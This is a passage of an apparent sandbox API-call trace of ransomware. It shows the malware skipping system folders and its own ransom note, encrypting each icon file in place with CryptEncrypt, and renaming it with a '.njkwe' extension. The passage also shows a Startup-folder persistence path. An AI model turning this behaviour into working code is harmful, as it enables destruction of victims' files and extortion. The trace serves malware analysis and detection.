liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.164] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.164] GetProcessHeap () returned 0xbe0000 [0062.164] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.164] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.164] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.164] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.164] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.164] CloseHandle (hObject=0x42c) returned 1 [0062.165] GetProcessHeap () returned 0xbe0000 [0062.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.165] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico_r00t_{3sXlE5}.njkwe") returned 66 [0062.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.165] GetProcessHeap () returned 0xbe0000 [0062.166] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.166] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0062.166] lstrcmpiW (lpString1="Rotate7.ico", lpString2="Windows") returned -1 [0062.166] lstrcmpiW (lpString1="Rotate7.ico", lpString2="$Recycle.bin") returned 1 [0062.166] lstrcmpiW (lpString1="Rotate7.ico", lpString2="System Volume Information") returned -1 [0062.166] lstrcmpiW (lpString1="Rotate7.ico", lpString2="Program Files") returned 1 [0062.166] lstrcmpiW (lpString1="Rotate7.ico", lpString2="Program Files (x86)") returned 1 [0062.166] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 46 [0062.166] StrStrIW (lpFirst="Rotate7.ico", lpSrch=".njkwe") returned 0x0 [0062.166] lstrcmpW (lpString1="Rotate7.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.166] lstrcmpW (lpString1="Rotate7.ico", lpString2="taridd") returned -1 [0062.166] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.166] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.166] GetTickCount () returned 0x114ff70 [0062.166] GetTickCount () returned 0x114ff70 [0062.166] GetTickCount () returned 0x114ff70 [0062.166] GetTickCount () returned 0x114ff70 [0062.166] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.166] GetProcessHeap () returned 0xbe0000 [0062.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.166] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.199] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.201] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.215] GetProcessHeap () returned 0xbe0000 [0062.215] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.215] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.215] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.215] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.215] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.215] CloseHandle (hObject=0x42c) returned 1 [0062.216] GetProcessHeap () returned 0xbe0000 [0062.216] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.216] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico_r00t_{3sXlE5}.njkwe") returned 66 [0062.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.217] GetProcessHeap () returned 0xbe0000 [0062.217] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.217] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0062.217] lstrcmpiW (lpString1="Rotate8.ico", lpString2="Windows") returned -1 [0062.217] lstrcmpiW (lpString1="Rotate8.ico", lpString2="$Recycle.bin") returned 1 [0062.217] lstrcmpiW (lpString1="Rotate8.ico", lpString2="System Volume Information") returned -1 [0062.217] lstrcmpiW (lpString1="Rotate8.ico", lpString2="Program Files") returned 1 [0062.217] lstrcmpiW (lpString1="Rotate8.ico", lpString2="Program Files (x86)") returned 1 [0062.217] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 46 [0062.217] StrStrIW (lpFirst="Rotate8.ico", lpSrch=".njkwe") returned 0x0 [0062.217] lstrcmpW (lpString1="Rotate8.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.217] lstrcmpW (lpString1="Rotate8.ico", lpString2="taridd") returned -1 [0062.217] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.217] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.218] GetTickCount () returned 0x114ff9f [0062.218] GetTickCount () returned 0x114ff9f [0062.218] GetTickCount () returned 0x114ff9f [0062.218] GetTickCount () returned 0x114ff9f [0062.218] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.218] GetProcessHeap () returned 0xbe0000 [0062.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.218] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.219] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.219] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.219] GetProcessHeap () returned 0xbe0000 [0062.220] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.220] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.220] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.220] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.220] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.220] CloseHandle (hObject=0x42c) returned 1 [0062.220] GetProcessHeap () returned 0xbe0000 [0062.221] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.221] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico_r00t_{3sXlE5}.njkwe") returned 66 [0062.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.221] GetProcessHeap () returned 0xbe0000 [0062.221] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.221] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0062.221] lstrcmpiW (lpString1="Save.ico", lpString2="Windows") returned -1 [0062.221] lstrcmpiW (lpString1="Save.ico", lpString2="$Recycle.bin") returned 1 [0062.221] lstrcmpiW (lpString1="Save.ico", lpString2="System Volume Information") returned -1 [0062.221] lstrcmpiW (lpString1="Save.ico", lpString2="Program Files") returned 1 [0062.221] lstrcmpiW (lpString1="Save.ico", lpString2="Program Files (x86)") returned 1 [0062.222] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 43 [0062.222] StrStrIW (lpFirst="Save.ico", lpSrch=".njkwe") returned 0x0 [0062.222] lstrcmpW (lpString1="Save.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.222] lstrcmpW (lpString1="Save.ico", lpString2="taridd") returned -1 [0062.222] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.222] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.222] GetTickCount () returned 0x114ffae [0062.222] GetTickCount () returned 0x114ffae [0062.222] GetTickCount () returned 0x114ffae [0062.222] GetTickCount () returned 0x114ffae [0062.222] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.222] GetProcessHeap () returned 0xbe0000 [0062.222] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.222] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0062.223] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffb82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.224] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x47e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0062.224] GetProcessHeap () returned 0xbe0000 [0062.224] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.224] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.224] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.224] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.224] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.224] CloseHandle (hObject=0x42c) returned 1 [0062.225] GetProcessHeap () returned 0xbe0000 [0062.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.225] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico_r00t_{3sXlE5}.njkwe") returned 63 [0062.225] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.225] GetProcessHeap () returned 0xbe0000 [0062.225] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.225] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0062.225] lstrcmpiW (lpString1="Setup.ico", lpString2="Windows") returned -1 [0062.225] lstrcmpiW (lpString1="Setup.ico", lpString2="$Recycle.bin") returned 1 [0062.225] lstrcmpiW (lpString1="Setup.ico", lpString2="System Volume Information") returned -1 [0062.225] lstrcmpiW (lpString1="Setup.ico", lpString2="Program Files") returned 1 [0062.225] lstrcmpiW (lpString1="Setup.ico", lpString2="Program Files (x86)") returned 1 [0062.225] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 44 [0062.225] StrStrIW (lpFirst="Setup.ico", lpSrch=".njkwe") returned 0x0 [0062.225] lstrcmpW (lpString1="Setup.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.226] lstrcmpW (lpString1="Setup.ico", lpString2="taridd") returned -1 [0062.226] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.226] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.226] GetTickCount () returned 0x114ffae [0062.226] GetTickCount () returned 0x114ffae [0062.226] GetTickCount () returned 0x114ffae [0062.226] GetTickCount () returned 0x114ffae [0062.226] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.226] GetProcessHeap () returned 0xbe0000 [0062.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.226] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0062.228] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.228] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0062.228] GetProcessHeap () returned 0xbe0000 [0062.228] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.228] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.228] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.228] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.228] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.229] CloseHandle (hObject=0x42c) returned 1 [0062.230] GetProcessHeap () returned 0xbe0000 [0062.230] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.230] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico_r00t_{3sXlE5}.njkwe") returned 64 [0062.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.231] GetProcessHeap () returned 0xbe0000 [0062.231] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.231] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0062.231] lstrcmpiW (lpString1="stop.ico", lpString2="Windows") returned -1 [0062.231] lstrcmpiW (lpString1="stop.ico", lpString2="$Recycle.bin") returned 1 [0062.231] lstrcmpiW (lpString1="stop.ico", lpString2="System Volume Information") returned -1 [0062.231] lstrcmpiW (lpString1="stop.ico", lpString2="Program Files") returned 1 [0062.231] lstrcmpiW (lpString1="stop.ico", lpString2="Program Files (x86)") returned 1 [0062.231] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 43 [0062.231] StrStrIW (lpFirst="stop.ico", lpSrch=".njkwe") returned 0x0 [0062.231] lstrcmpW (lpString1="stop.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.231] lstrcmpW (lpString1="stop.ico", lpString2="taridd") returned -1 [0062.231] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.231] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.231] GetTickCount () returned 0x114ffae [0062.231] GetTickCount () returned 0x114ffae [0062.231] GetTickCount () returned 0x114ffae [0062.231] GetTickCount () returned 0x114ffae [0062.231] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.231] GetProcessHeap () returned 0xbe0000 [0062.231] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.232] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, 